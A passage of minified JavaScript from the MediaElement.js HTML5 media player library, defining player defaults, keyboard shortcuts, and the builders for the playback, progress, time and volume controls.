5:}}},window.onYouTubePlayerAPIReady=function(){mejs.YouTubeApi.iFrameReady()},window.onYouTubePlayerReady=function(a){mejs.YouTubeApi.flashReady(a)},window.mejs=mejs,window.MediaElement=mejs.MediaElement,function(a,b,c){"use strict";var d={locale:{language:b.i18n&&b.i18n.locale.language||"",strings:b.i18n&&b.i18n.locale.strings||{}},ietf_lang_regex:/^(x\-)?[a-z]{2,}(\-\w{2,})?(\-\w{2,})?$/,methods:{}};d.getLanguage=function(){var a=d.locale.language||window.navigator.userLanguage||window.navigator.language;return d.ietf_lang_regex.exec(a)?a:null},"undefined"!=typeof mejsL10n&&(d.locale.language=mejsL10n.language),d.methods.checkPlain=function(a){var b,c,d={"&":"&amp;",'"':"&quot;","<":"&lt;",">":"&gt;"};a=String(a);for(b in d)d.hasOwnProperty(b)&&(c=new RegExp(b,"g"),a=a.replace(c,d[b]));return a},d.methods.t=function(a,b){return d.locale.strings&&d.locale.strings[b.context]&&d.locale.strings[b.context][a]&&(a=d.locale.strings[b.context][a]),d.methods.checkPlain(a)},d.t=function(a,b){if("string"==typeof a&&a.length>0){var c=d.getLanguage();return b=b||{context:c},d.methods.t(a,b)}throw{name:"InvalidArgumentException",message:"First argument is either not a string or empty."}},b.i18n=d}(document,mejs),function(a,b){"use strict";"undefined"!=typeof mejsL10n&&(a[mejsL10n.language]=mejsL10n.strings)}(mejs.i18n.locale.strings), /*! * * MediaElementPlayer * http://mediaelementjs.com/ * * Creates a controller bar for HTML5 <video> add <audio> tags * using jQuery and MediaElement.js (HTML5 Flash/Silverlight wrapper) * * Copyright 2010-2013, John Dyer (http://j.hn/) * License: MIT * */ "undefined"!=typeof jQuery?mejs.$=jQuery:"undefined"!=typeof Zepto?(mejs.$=Zepto,Zepto.fn.outerWidth=function(a){var b=$(this).width();return a&&(b+=parseInt($(this).css("margin-right"),10),b+=parseInt($(this).css("margin-left"),10)),b}):"undefined"!=typeof ender&&(mejs.$=ender),function(a){mejs.MepDefaults={poster:"",showPosterWhenEnded:!1,defaultVideoWidth:480,defaultVideoHeight:270,videoWidth:-1,videoHeight:-1,defaultAudioWidth:400,defaultAudioHeight:30,defaultSeekBackwardInterval:function(a){return.05*a.duration},defaultSeekForwardInterval:function(a){return.05*a.duration},setDimensions:!0,audioWidth:-1,audioHeight:-1,startVolume:.8,loop:!1,autoRewind:!0,enableAutosize:!0,timeFormat:"",alwaysShowHours:!1,showTimecodeFrameCount:!1,framesPerSecond:25,autosizeProgress:!0,alwaysShowControls:!1,hideVideoControlsOnLoad:!1,clickToPlayPause:!0,iPadUseNativeControls:!1,iPhoneUseNativeControls:!1,AndroidUseNativeControls:!1,features:["playpause","current","progress","duration","tracks","volume","fullscreen"],isVideo:!0,enableKeyboard:!0,pauseOtherPlayers:!0,keyActions:[{keys:[32,179],action:function(a,b){b.paused||b.ended?b.play():b.pause()}},{keys:[38],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.min(b.volume+.1,1);b.setVolume(c)}},{keys:[40],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.max(b.volume-.1,0);b.setVolume(c)}},{keys:[37,227],action:function(a,b){if(!isNaN(b.duration)&&b.duration>0){a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.max(b.currentTime-a.options.defaultSeekBackwardInterval(b),0);b.setCurrentTime(c)}}},{keys:[39,228],action:function(a,b){if(!isNaN(b.duration)&&b.duration>0){a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.min(b.currentTime+a.options.defaultSeekForwardInterval(b),b.duration);b.setCurrentTime(c)}}},{keys:[70],action:function(a,b){"undefined"!=typeof a.enterFullScreen&&(a.isFullScreen?a.exitFullScreen():a.enterFullScreen())}},{keys:[77],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer()),a.media.muted?a.setMuted(!1):a.setMuted(!0)}}]},mejs.mepIndex=0,mejs.players={},mejs.MediaElementPlayer=function(b,c){if(!(this instanceof mejs.MediaElementPlayer))return new mejs.MediaElementPlayer(b,c);var d=this;return d.$media=d.$node=a(b),d.node=d.media=d.$media[0],d.node?"undefined"!=typeof d.node.player?d.node.player:("undefined"==typeof c&&(c=d.$node.data("mejsoptions")),d.options=a.extend({},mejs.MepDefaults,c),d.options.timeFormat||(d.options.timeFormat="mm:ss",d.options.alwaysShowHours&&(d.options.timeFormat="hh:mm:ss"),d.options.showTimecodeFrameCount&&(d.options.timeFormat+=":ff")),mejs.Utility.calculateTimeFormat(0,d.options,d.options.framesPerSecond||25),d.id="mep_"+mejs.mepIndex++,mejs.players[d.id]=d,d.init(),d):void 0},mejs.MediaElementPlayer.prototype={hasFocus:!1,controlsAreVisible:!0,init:function(){var b=this,c=mejs.MediaFeatures,d=a.extend(!0,{},b.options,{success:function(a,c){b.meReady(a,c)},error:function(a){b.handleError(a)}}),e=b.media.tagName.toLowerCase();if(b.isDynamic="audio"!==e&&"video"!==e,b.isDynamic?b.isVideo=b.options.isVideo:b.isVideo="audio"!==e&&b.options.isVideo,c.isiPad&&b.options.iPadUseNativeControls||c.isiPhone&&b.options.iPhoneUseNativeControls)b.$media.attr("controls","controls"),c.isiPad&&null!==b.media.getAttribute("autoplay")&&b.play();else if(c.isAndroid&&b.options.AndroidUseNativeControls);else{b.$media.removeAttr("controls");var f=b.isVideo?mejs.i18n.t("Video Player"):mejs.i18n.t("Audio Player");a('<span class="mejs-offscreen">'+f+"</span>").insertBefore(b.$media),b.container=a('<div id="'+b.id+'" class="mejs-container '+(mejs.MediaFeatures.svgAsImg?"svg":"no-svg")+'" tabindex="0" role="application" aria-label="'+f+'"><div class="mejs-inner"><div class="mejs-mediaelement"></div><div class="mejs-layers"></div><div class="mejs-controls"></div><div class="mejs-clear"></div></div></div>').addClass(b.$media[0].className).insertBefore(b.$media).focus(function(a){if(!b.controlsAreVisible){b.showControls(!0);var c=b.container.find(".mejs-playpause-button > button");c.focus()}}),b.container.addClass((c.isAndroid?"mejs-android ":"")+(c.isiOS?"mejs-ios ":"")+(c.isiPad?"mejs-ipad ":"")+(c.isiPhone?"mejs-iphone ":"")+(b.isVideo?"mejs-video ":"mejs-audio ")),b.container.find(".mejs-mediaelement").append(b.$media),b.node.player=b,b.controls=b.container.find(".mejs-controls"),b.layers=b.container.find(".mejs-layers");var g=b.isVideo?"video":"audio",h=g.substring(0,1).toUpperCase()+g.substring(1);b.options[g+"Width"]>0||b.options[g+"Width"].toString().indexOf("%")>-1?b.width=b.options[g+"Width"]:""!==b.media.style.width&&null!==b.media.style.width?b.width=b.media.style.width:null!==b.media.getAttribute("width")?b.width=b.$media.attr("width"):b.width=b.options["default"+h+"Width"],b.options[g+"Height"]>0||b.options[g+"Height"].toString().indexOf("%")>-1?b.height=b.options[g+"Height"]:""!==b.media.style.height&&null!==b.media.style.height?b.height=b.media.style.height:null!==b.$media[0].getAttribute("height")?b.height=b.$media.attr("height"):b.height=b.options["default"+h+"Height"],b.setPlayerSize(b.width,b.height),d.pluginWidth=b.width,d.pluginHeight=b.height}mejs.MediaElement(b.$media[0],d),"undefined"!=typeof b.container&&b.controlsAreVisible&&b.container.trigger("controlsshown")},showControls:function(a){var b=this;a="undefined"==typeof a||a,b.controlsAreVisible||(a?(b.controls.removeClass("mejs-offscreen").stop(!0,!0).fadeIn(200,function(){b.controlsAreVisible=!0,b.container.trigger("controlsshown")}),b.container.find(".mejs-control").removeClass("mejs-offscreen").stop(!0,!0).fadeIn(200,function(){b.controlsAreVisible=!0})):(b.controls.removeClass("mejs-offscreen").css("display","block"),b.container.find(".mejs-control").removeClass("mejs-offscreen").css("display","block"),b.controlsAreVisible=!0,b.container.trigger("controlsshown")),b.setControlsSize())},hideControls:function(b){var c=this;b="undefined"==typeof b||b,!c.controlsAreVisible||c.options.alwaysShowControls||c.keyboardAction||(b?(c.controls.stop(!0,!0).fadeOut(200,function(){a(this).addClass("mejs-offscreen").css("display","block"),c.controlsAreVisible=!1,c.container.trigger("controlshidden")}),c.container.find(".mejs-control").stop(!0,!0).fadeOut(200,function(){a(this).addClass("mejs-offscreen").css("display","block")})):(c.controls.addClass("mejs-offscreen").css("display","block"),c.container.find(".mejs-control").addClass("mejs-offscreen").css("display","block"),c.controlsAreVisible=!1,c.container.trigger("controlshidden")))},controlsTimer:null,startControlsTimer:function(a){var b=this;a="undefined"!=typeof a?a:1500,b.killControlsTimer("start"),b.controlsTimer=setTimeout(function(){b.hideControls(),b.killControlsTimer("hide")},a)},killControlsTimer:function(a){var b=this;null!==b.controlsTimer&&(clearTimeout(b.controlsTimer),delete b.controlsTimer,b.controlsTimer=null)},controlsEnabled:!0,disableControls:function(){var a=this;a.killControlsTimer(),a.hideControls(!1),this.controlsEnabled=!1},enableControls:function(){var a=this;a.showControls(!1),a.controlsEnabled=!0},meReady:function(b,c){var d,e,f=this,g=mejs.MediaFeatures,h=c.getAttribute("autoplay"),i=!("undefined"==typeof h||null===h||"false"===h);if(!f.created){if(f.created=!0,f.media=b,f.domNode=c,!(g.isAndroid&&f.options.AndroidUseNativeControls||g.isiPad&&f.options.iPadUseNativeControls||g.isiPhone&&f.options.iPhoneUseNativeControls)){f.buildposter(f,f.controls,f.layers,f.media),f.buildkeyboard(f,f.controls,f.layers,f.media),f.buildoverlays(f,f.controls,f.layers,f.media),f.findTracks();for(d in f.options.features)if(e=f.options.features[d],f["build"+e])try{f["build"+e](f,f.controls,f.layers,f.media)}catch(j){}f.container.trigger("controlsready"),f.setPlayerSize(f.width,f.height),f.setControlsSize(),f.isVideo&&(mejs.MediaFeatures.hasTouch?f.$media.bind("touchstart",function(){f.controlsAreVisible?f.hideControls(!1):f.controlsEnabled&&f.showControls(!1)}):(f.clickToPlayPauseCallback=function(){f.options.clickToPlayPause&&(f.media.paused?f.play():f.pause())},f.media.addEventListener("click",f.clickToPlayPauseCallback,!1),f.container.bind("mouseenter",function(){f.controlsEnabled&&(f.options.alwaysShowControls||(f.killControlsTimer("enter"),f.showControls(),f.startControlsTimer(2500)))}).bind("mousemove",function(){f.controlsEnabled&&(f.controlsAreVisible||f.showControls(),f.options.alwaysShowControls||f.startControlsTimer(2500))}).bind("mouseleave",function(){f.controlsEnabled&&(f.media.paused||f.options.alwaysShowControls||f.startControlsTimer(1e3))})),f.options.hideVideoControlsOnLoad&&f.hideControls(!1),i&&!f.options.alwaysShowControls&&f.hideControls(),f.options.enableAutosize&&f.media.addEventListener("loadedmetadata",function(a){f.options.videoHeight<=0&&null===f.domNode.getAttribute("height")&&!isNaN(a.target.videoHeight)&&(f.setPlayerSize(a.target.videoWidth,a.target.videoHeight),f.setControlsSize(),f.media.setVideoSize(a.target.videoWidth,a.target.videoHeight))},!1)),b.addEventListener("play",function(){var a;for(a in mejs.players){var b=mejs.players[a];b.id==f.id||!f.options.pauseOtherPlayers||b.paused||b.ended||b.pause(),b.hasFocus=!1}f.hasFocus=!0},!1),f.media.addEventListener("ended",function(b){if(f.options.autoRewind)try{f.media.setCurrentTime(0),window.setTimeout(function(){a(f.container).find(".mejs-overlay-loading").parent().hide()},20)}catch(c){}f.media.pause(),f.setProgressRail&&f.setProgressRail(),f.setCurrentRail&&f.setCurrentRail(),f.options.loop?f.play():!f.options.alwaysShowControls&&f.controlsEnabled&&f.showControls()},!1),f.media.addEventListener("loadedmetadata",function(a){f.updateDuration&&f.updateDuration(),f.updateCurrent&&f.updateCurrent(),f.isFullScreen||(f.setPlayerSize(f.width,f.height),f.setControlsSize())},!1);var k=null;f.media.addEventListener("timeupdate",function(){k!==this.duration&&(k=this.duration,mejs.Utility.calculateTimeFormat(k,f.options,f.options.framesPerSecond||25),f.updateDuration&&f.updateDuration(),f.updateCurrent&&f.updateCurrent(),f.setControlsSize())},!1),f.container.focusout(function(b){if(b.relatedTarget){var c=a(b.relatedTarget);f.keyboardAction&&0===c.parents(".mejs-container").length&&(f.keyboardAction=!1,f.hideControls(!0))}}),setTimeout(function(){f.setPlayerSize(f.width,f.height),f.setControlsSize()},50),f.globalBind("resize",function(){f.isFullScreen||mejs.MediaFeatures.hasTrueNativeFullScreen&&document.webkitIsFullScreen||f.setPlayerSize(f.width,f.height),f.setControlsSize()}),"youtube"==f.media.pluginType&&(g.isiOS||g.isAndroid)&&(f.container.find(".mejs-overlay-play").hide(),f.container.find(".mejs-poster").hide())}i&&"native"==b.pluginType&&f.play(),f.options.success&&("string"==typeof f.options.success?window[f.options.success](f.media,f.domNode,f):f.options.success(f.media,f.domNode,f))}},handleError:function(a){var b=this;b.controls&&b.controls.hide(),b.options.error&&b.options.error(a)},setPlayerSize:function(b,c){var d=this;if(!d.options.setDimensions)return!1;if("undefined"!=typeof b&&(d.width=b),"undefined"!=typeof c&&(d.height=c),d.height.toString().indexOf("%")>0||"none"!==d.$node.css("max-width")&&"t.width"!==d.$node.css("max-width")||d.$node[0].currentStyle&&"100%"===d.$node[0].currentStyle.maxWidth){var e=function(){return d.isVideo?d.media.videoWidth&&d.media.videoWidth>0?d.media.videoWidth:null!==d.media.getAttribute("width")?d.media.getAttribute("width"):d.options.defaultVideoWidth:d.options.defaultAudioWidth}(),f=function(){return d.isVideo?d.media.videoHeight&&d.media.videoHeight>0?d.media.videoHeight:null!==d.media.getAttribute("height")?d.media.getAttribute("height"):d.options.defaultVideoHeight:d.options.defaultAudioHeight}(),g=d.container.parent().closest(":visible").width(),h=d.container.parent().closest(":visible").height(),i=d.isVideo||!d.options.autosizeProgress?parseInt(g*f/e,10):f;isNaN(i)&&(i=h),d.container.parent().length>0&&"body"===d.container.parent()[0].tagName.toLowerCase()&&(g=a(window).width(),i=a(window).height()),i&&g&&(d.container.width(g).height(i),d.$media.add(d.container.find(".mejs-shim")).width("100%").height("100%"),d.isVideo&&d.media.setVideoSize&&d.media.setVideoSize(g,i),d.layers.children(".mejs-layer").width("100%").height("100%"))}else d.container.width(d.width).height(d.height),d.layers.children(".mejs-layer").width(d.width).height(d.height)},setControlsSize:function(){var b=this,c=0,d=0,e=b.controls.find(".mejs-time-rail"),f=b.controls.find(".mejs-time-total"),g=e.siblings(),h=g.last(),i=null;if(b.container.is(":visible")&&e.length&&e.is(":visible")){b.options&&!b.options.autosizeProgress&&(d=parseInt(e.css("width"),10)),0!==d&&d||(g.each(function(){var b=a(this);"absolute"!=b.css("position")&&b.is(":visible")&&(c+=a(this).outerWidth(!0))}),d=b.controls.width()-c-(e.outerWidth(!0)-e.width()));do e.width(d),f.width(d-(f.outerWidth(!0)-f.width())),"absolute"!=h.css("position")&&(i=h.length?h.position():null,d--);while(null!==i&&i.top.toFixed(2)>0&&d>0);b.container.trigger("controlsresize")}},buildposter:function(b,c,d,e){var f=this,g=a('<div class="mejs-poster mejs-layer"></div>').appendTo(d),h=b.$media.attr("poster");""!==b.options.poster&&(h=b.options.poster),h?f.setPoster(h):g.hide(),e.addEventListener("play",function(){g.hide()},!1),b.options.showPosterWhenEnded&&b.options.autoRewind&&e.addEventListener("ended",function(){g.show()},!1)},setPoster:function(b){var c=this,d=c.container.find(".mejs-poster"),e=d.find("img");0===e.length&&(e=a('<img width="100%" height="100%" alt="" />').appendTo(d)),e.attr("src",b),d.css({"background-image":"url("+b+")"})},buildoverlays:function(b,c,d,e){var f=this;if(b.isVideo){var g=a('<div class="mejs-overlay mejs-layer"><div class="mejs-overlay-loading"><span></span></div></div>').hide().appendTo(d),h=a('<div class="mejs-overlay mejs-layer"><div class="mejs-overlay-error"></div></div>').hide().appendTo(d),i=a('<div class="mejs-overlay mejs-layer mejs-overlay-play"><div class="mejs-overlay-button"></div></div>').appendTo(d).bind("click",function(){f.options.clickToPlayPause&&e.paused&&e.play()});e.addEventListener("play",function(){i.hide(),g.hide(),c.find(".mejs-time-buffering").hide(),h.hide()},!1),e.addEventListener("playing",function(){i.hide(),g.hide(),c.find(".mejs-time-buffering").hide(),h.hide()},!1),e.addEventListener("seeking",function(){g.show(),c.find(".mejs-time-buffering").show()},!1),e.addEventListener("seeked",function(){g.hide(),c.find(".mejs-time-buffering").hide()},!1),e.addEventListener("pause",function(){mejs.MediaFeatures.isiPhone||i.show()},!1),e.addEventListener("waiting",function(){g.show(),c.find(".mejs-time-buffering").show()},!1),e.addEventListener("loadeddata",function(){g.show(),c.find(".mejs-time-buffering").show(),mejs.MediaFeatures.isAndroid&&(e.canplayTimeout=window.setTimeout(function(){if(document.createEvent){var a=document.createEvent("HTMLEvents");return a.initEvent("canplay",!0,!0),e.dispatchEvent(a)}},300))},!1),e.addEventListener("canplay",function(){g.hide(),c.find(".mejs-time-buffering").hide(),clearTimeout(e.canplayTimeout)},!1),e.addEventListener("error",function(a){f.handleError(a),g.hide(),i.hide(),h.show(),h.find(".mejs-overlay-error").html("Error loading this resource")},!1),e.addEventListener("keydown",function(a){f.onkeydown(b,e,a)},!1)}},buildkeyboard:function(b,c,d,e){var f=this;f.container.keydown(function(){f.keyboardAction=!0}),f.globalBind("keydown",function(c){return b.hasFocus=0!==a(c.target).closest(".mejs-container").length&&a(c.target).closest(".mejs-container").attr("id")===b.$media.closest(".mejs-container").attr("id"),f.onkeydown(b,e,c)}),f.globalBind("click",function(c){b.hasFocus=0!==a(c.target).closest(".mejs-container").length})},onkeydown:function(a,b,c){if(a.hasFocus&&a.options.enableKeyboard)for(var d=0,e=a.options.keyActions.length;e>d;d++)for(var f=a.options.keyActions[d],g=0,h=f.keys.length;h>g;g++)if(c.keyCode==f.keys[g])return"function"==typeof c.preventDefault&&c.preventDefault(),f.action(a,b,c.keyCode,c),!1;return!0},findTracks:function(){var b=this,c=b.$media.find("track");b.tracks=[],c.each(function(c,d){d=a(d),b.tracks.push({srclang:d.attr("srclang")?d.attr("srclang").toLowerCase():"",src:d.attr("src"),kind:d.attr("kind"),label:d.attr("label")||"",entries:[],isLoaded:!1})})},changeSkin:function(a){this.container[0].className="mejs-container "+a,this.setPlayerSize(this.width,this.height),this.setControlsSize()},play:function(){this.load(),this.media.play()},pause:function(){try{this.media.pause()}catch(a){}},load:function(){this.isLoaded||this.media.load(),this.isLoaded=!0},setMuted:function(a){this.media.setMuted(a)},setCurrentTime:function(a){this.media.setCurrentTime(a)},getCurrentTime:function(){return this.media.currentTime},setVolume:function(a){this.media.setVolume(a)},getVolume:function(){return this.media.volume},setSrc:function(a){this.media.setSrc(a)},remove:function(){var a,b,c=this;c.container.prev(".mejs-offscreen").remove();for(a in c.options.features)if(b=c.options.features[a],c["clean"+b])try{c["clean"+b](c)}catch(d){}c.isDynamic?c.$node.insertBefore(c.container):(c.$media.prop("controls",!0),c.$node.clone().insertBefore(c.container).show(),c.$node.remove()),"native"!==c.media.pluginType&&c.media.remove(),delete mejs.players[c.id],"object"==typeof c.container&&c.container.remove(),c.globalUnbind(),delete c.node.player},rebuildtracks:function(){var a=this;a.findTracks(),a.buildtracks(a,a.controls,a.layers,a.media)},resetSize:function(){var a=this;setTimeout(function(){a.setPlayerSize(a.width,a.height),a.setControlsSize()},50)}},function(){function b(b,d){var e={d:[],w:[]};return a.each((b||"").split(" "),function(a,b){var f=b+"."+d;0===f.indexOf(".")?(e.d.push(f),e.w.push(f)):e[c.test(b)?"w":"d"].push(f)}),e.d=e.d.join(" "),e.w=e.w.join(" "),e}var c=/^((after|before)print|(before)?unload|hashchange|message|o(ff|n)line|page(hide|show)|popstate|resize|storage)\b/;mejs.MediaElementPlayer.prototype.globalBind=function(c,d,e){var f=this,g=f.node?f.node.ownerDocument:document;c=b(c,f.id),c.d&&a(g).bind(c.d,d,e),c.w&&a(window).bind(c.w,d,e)},mejs.MediaElementPlayer.prototype.globalUnbind=function(c,d){var e=this,f=e.node?e.node.ownerDocument:document;c=b(c,e.id),c.d&&a(f).unbind(c.d,d),c.w&&a(window).unbind(c.w,d)}}(),"undefined"!=typeof a&&(a.fn.mediaelementplayer=function(b){return b===!1?this.each(function(){var b=a(this).data("mediaelementplayer");b&&b.remove(),a(this).removeData("mediaelementplayer")}):this.each(function(){a(this).data("mediaelementplayer",new mejs.MediaElementPlayer(this,b))}),this},a(document).ready(function(){a(".mejs-player").mediaelementplayer()})),window.MediaElementPlayer=mejs.MediaElementPlayer}(mejs.$),function(a){a.extend(mejs.MepDefaults,{playText:mejs.i18n.t("Play"),pauseText:mejs.i18n.t("Pause")}),a.extend(MediaElementPlayer.prototype,{buildplaypause:function(b,c,d,e){function f(a){"play"===a?(i.removeClass("mejs-play").addClass("mejs-pause"),j.attr({title:h.pauseText,"aria-label":h.pauseText})):(i.removeClass("mejs-pause").addClass("mejs-play"),j.attr({title:h.playText,"aria-label":h.playText}))}var g=this,h=g.options,i=a('<div class="mejs-button mejs-playpause-button mejs-play" ><button type="button" aria-controls="'+g.id+'" title="'+h.playText+'" aria-label="'+h.playText+'"></button></div>').appendTo(c).click(function(a){return a.preventDefault(),e.paused?e.play():e.pause(),!1}),j=i.find("button");f("pse"),e.addEventListener("play",function(){f("play")},!1),e.addEventListener("playing",function(){f("play")},!1),e.addEventListener("pause",function(){f("pse")},!1),e.addEventListener("paused",function(){f("pse")},!1)}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{stopText:"Stop"}),a.extend(MediaElementPlayer.prototype,{buildstop:function(b,c,d,e){var f=this;a('<div class="mejs-button mejs-stop-button mejs-stop"><button type="button" aria-controls="'+f.id+'" title="'+f.options.stopText+'" aria-label="'+f.options.stopText+'"></button></div>').appendTo(c).click(function(){e.paused||e.pause(),e.currentTime>0&&(e.setCurrentTime(0),e.pause(),c.find(".mejs-time-current").width("0px"),c.find(".mejs-time-handle").css("left","0px"),c.find(".mejs-time-float-current").html(mejs.Utility.secondsToTimeCode(0,b.options)),c.find(".mejs-currenttime").html(mejs.Utility.secondsToTimeCode(0,b.options)),d.find(".mejs-poster").show())})}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{progessHelpText:mejs.i18n.t("Use Left/Right Arrow keys to advance one second, Up/Down arrows to advance ten seconds.")}),a.extend(MediaElementPlayer.prototype,{buildprogress:function(b,c,d,e){a('<div class="mejs-time-rail"><span class="mejs-time-total mejs-time-slider"><span class="mejs-time-buffering"></span><span class="mejs-time-loaded"></span><span class="mejs-time-current"></span><span class="mejs-time-handle"></span><span class="mejs-time-float"><span class="mejs-time-float-current">00:00</span><span class="mejs-time-float-corner"></span></span></span></div>').appendTo(c),c.find(".mejs-time-buffering").hide();var f=this,g=c.find(".mejs-time-total"),h=c.find(".mejs-time-loaded"),i=c.find(".mejs-time-current"),j=c.find(".mejs-time-handle"),k=c.find(".mejs-time-float"),l=c.find(".mejs-time-float-current"),m=c.find(".mejs-time-slider"),n=function(a){var c,d=g.offset(),f=g.width(),h=0,i=0,j=0;c=a.originalEvent&&a.originalEvent.changedTouches?a.originalEvent.changedTouches[0].pageX:a.changedTouches?a.changedTouches[0].pageX:a.pageX,e.duration&&(c<d.left?c=d.left:c>f+d.left&&(c=f+d.left),j=c-d.left,h=j/f,i=.02>=h?0:h*e.duration,o&&i!==e.currentTime&&e.setCurrentTime(i),mejs.MediaFeatures.hasTouch||(k.css("left",j),l.html(mejs.Utility.secondsToTimeCode(i,b.options)),k.show()))},o=!1,p=!1,q=0,r=!1,s=b.options.autoRewind,t=function(a){var c=e.currentTime,d=mejs.i18n.t("Time Slider"),f=mejs.Utility.secondsToTimeCode(c,b.options),g=e.duration;m.attr({"aria-label":d,"aria-valuemin":0,"aria-valuemax":g,"aria-valuenow":c,"aria-valuetext":f,role:"slider",tabindex:0})},u=function(){var a=new Date;a-q>=1e3&&e.play()};m.bind("focus",function(a){b.options.autoRewind=!1}),m.bind("blur",function(a){b.options.autoRewind=s}),m.bind("keydown",function(a){new Date-q>=1e3&&(r=e.paused);var c=a.keyCode,d=e.duration,f=e.currentTime,g=b.options.defaultSeekForwardInterval(d),h=b.options.defaultSeekBackwardInterval(d);switch(c){case 37:case 40:f-=h;break;case 39:case 38:f+=g;break;case 36:f=0;break;case 35:f=d;break;case 32:case 13:return void(e.paused?e.play():e.pause());default:return}return f=0>f?0:f>=d?d:Math.floor(f),q=new Date,r||e.pause(),f<e.duration&&!r&&setTimeout(u,1100),e.setCurrentTime(f),a.preventDefault(),a.stopPropagation(),!1}),g.bind("mousedown touchstart",function(a){(1===a.which||0===a.which)&&(o=!0,n(a),f.globalBind("mousemove.dur touchmove.dur",function(a){n(a)}),f.globalBind("mouseup.dur touchend.dur",function(a){o=!1,k.hide(),f.globalUnbind(".dur")}))}).bind("mouseenter",function(a){p=!0,f.globalBind("mousemove.dur",function(a){n(a)}),mejs.MediaFeatures.hasTouch||k.show()}).bind("mouseleave",function(a){p=!1,o||(f.globalUnbind(".dur"),k.hide())}),e.addEventListener("progress",function(a){b.setProgressRail(a),b.setCurrentRail(a)},!1),e.addEventListener("timeupdate",function(a){b.setProgressRail(a),b.setCurrentRail(a),t(a)},!1),f.container.on("controlsresize",function(){b.setProgressRail(),b.setCurrentRail()}),f.loaded=h,f.total=g,f.current=i,f.handle=j},setProgressRail:function(a){var b=this,c=void 0!==a?a.target:b.media,d=null;c&&c.buffered&&c.buffered.length>0&&c.buffered.end&&c.duration?d=c.buffered.end(c.buffered.length-1)/c.duration:c&&void 0!==c.bytesTotal&&c.bytesTotal>0&&void 0!==c.bufferedBytes?d=c.bufferedBytes/c.bytesTotal:a&&a.lengthComputable&&0!==a.total&&(d=a.loaded/a.total),null!==d&&(d=Math.min(1,Math.max(0,d)),b.loaded&&b.total&&b.loaded.width(b.total.width()*d))},setCurrentRail:function(){var a=this;if(void 0!==a.media.currentTime&&a.media.duration&&a.total&&a.handle){var b=Math.round(a.total.width()*a.media.currentTime/a.media.duration),c=b-Math.round(a.handle.outerWidth(!0)/2);a.current.width(b),a.handle.css("left",c)}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{duration:-1,timeAndDurationSeparator:"<span> | </span>"}),a.extend(MediaElementPlayer.prototype,{buildcurrent:function(b,c,d,e){var f=this;a('<div class="mejs-time" role="timer" aria-live="off"><span class="mejs-currenttime">'+mejs.Utility.secondsToTimeCode(0,b.options)+"</span></div>").appendTo(c),f.currenttime=f.controls.find(".mejs-currenttime"),e.addEventListener("timeupdate",function(){b.updateCurrent()},!1)},buildduration:function(b,c,d,e){var f=this;c.children().last().find(".mejs-currenttime").length>0?a(f.options.timeAndDurationSeparator+'<span class="mejs-duration">'+mejs.Utility.secondsToTimeCode(f.options.duration,f.options)+"</span>").appendTo(c.find(".mejs-time")):(c.find(".mejs-currenttime").parent().addClass("mejs-currenttime-container"),a('<div class="mejs-time mejs-duration-container"><span class="mejs-duration">'+mejs.Utility.secondsToTimeCode(f.options.duration,f.options)+"</span></div>").appendTo(c)),f.durationD=f.controls.find(".mejs-duration"),e.addEventListener("timeupdate",function(){b.updateDuration()},!1)},updateCurrent:function(){var a=this,b=a.media.currentTime;isNaN(b)&&(b=0),a.currenttime&&a.currenttime.html(mejs.Utility.secondsToTimeCode(b,a.options))},updateDuration:function(){var a=this,b=a.media.duration;a.options.duration>0&&(b=a.options.duration),isNaN(b)&&(b=0),a.container.toggleClass("mejs-long-video",b>3600),a.durationD&&b>0&&a.durationD.html(mejs.Utility.secondsToTimeCode(b,a.options))}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{muteText:mejs.i18n.t("Mute Toggle"),allyVolumeControlText:mejs.i18n.t("Use Up/Down Arrow keys to increase or decrease volume."),hideVolumeOnTouchDevices:!0,audioVolume:"horizontal",videoVolume:"vertical"}),a.extend(MediaElementPlayer.prototype,{buildvolume:function(b,c,d,e){if(!mejs.MediaFeatures.isAndroid&&!mejs.MediaFeatures.isiOS||!this.options.hideVolumeOnTouchDevices){var f=this,g=f.isVideo?f.options.videoVolume:f.options.audioVolume,h="horizontal"==g?a('<div class="mejs-button mejs-volume-button mejs-mute"><button type="button" aria-controls="'+f.id+'" title="'+f.options.muteText+'" aria-label="'+f.options.muteText+'"></button></div><a href="javascript:void(0);" class="mejs-horizontal-volume-slider"><span class="mejs-offscreen">'+f.options.allyVolumeControlText+'</span><div class="mejs-horizontal-volume-total"></div><div class="mejs-horizontal-volume-current"></div><div class="mejs-horizontal-volume-handle"></div></a>').appendTo(c):a('<div class="mejs-button mejs-volume-button mejs-mute"><button type="button" aria-controls="'+f.id+'" title="'+f.options.muteText+'" aria-label="'+f.options.muteText+'"></button><a href="javascript:void(0);" class="mejs-volume-slider"><span class="mejs-offscreen">'+f.options.allyVolumeControlText+'</span><div class="mejs-volume-total"></div><div class="mejs-volume-current"></div><div class="mejs-volume-handle"></div></a></div>').appendTo(c),i=f.container.find(".mejs-volume-slider, .mejs-horizontal-volume-slider"),j=f.container.find(".mejs-volume-total, .mejs-horizontal-volume-total"),k=f.container.find(".mejs-volume-current, .mejs-horizontal-volume-current"),l=f.container.find(".mejs-volume-handle, .mejs-horizontal-volume-handle"),m=function(a,b){if(!i.is(":visible")&&"undefined"==typeof b)return i.show(),m(a,!0),void i.hide();a=Math.max(0,a),a=Math.min(a,1),0===a?(h.removeClass("mejs-mute").addClass("mejs-unmute"),h.children("button").attr("title",mejs.i18n.t("Unmute")).attr("aria-label",mejs.i18n.t("Unmute"))):(h.removeClass("mejs-unmute").addClass("mejs-mute"),h.children("button").attr("title",mejs.i18n.t("Mute")).attr("aria-label",mejs.i18n.t("Mute")));var c=j.position();if("vertical"==g){var d=j.height(),e=d-d*a;l.css("top",Math.round(c.top+e-l.height()/2)),k.height(d-e),k.css("top",c.top+e)}else{var f=j.width(),n=f*a;l.css("left",Math.round(c.left+n-l.width()/2)),k.width(Math.round(n))}},n=function(a){var b=null,c=j.offset();if("vertical"===g){var 